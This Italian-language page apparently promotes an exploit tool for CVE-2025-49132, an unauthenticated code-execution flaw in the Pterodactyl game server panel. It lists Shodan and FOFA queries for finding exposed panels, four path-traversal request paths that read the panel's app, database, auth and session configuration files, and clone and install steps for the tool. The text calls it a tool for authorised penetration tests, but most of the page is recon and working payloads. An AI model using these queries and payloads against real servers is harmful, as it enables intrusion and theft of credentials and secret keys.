
Strumento di exploit per CVE-2025-49132, una RCE critica non autenticata nei pannelli server di gioco Pterodactyl. Include query di ricognizione e payload per test di penetrazione autorizzati.
Strumento di exploit per CVE-2025-49132 — una vulnerabilità critica di esecuzione arbitraria di codice non autenticata che colpisce il pannello del server di gioco Pterodactyl.
Una falla ACE critica nel pannello Pterodactyl che consente a aggressori remoti non autenticati di eseguire codice arbitrario — portando potenzialmente a compromissione totale del sistema.
Nessuna autenticazione necessaria. Solo un'istanza vulnerabile.
Shodan
http.title:"Pterodactyl"
FOFA
"Pterodactyl"
locales/locale.json?locale=../../../pterodactyl&namespace=config/app
locales/locale.json?locale=../../../pterodactyl&namespace=config/database
locales/locale.json?locale=../../../pterodactyl&namespace=config/auth
locales/locale.json?locale=../../../pterodactyl&namespace=config/session
git clone https://github.com/yurahshell/CVE-2025-49132
cd CVE-2025-49132
pip install -r requirements.txt
| Software | Stato |
|---|---|
| Pannello Pterodactyl |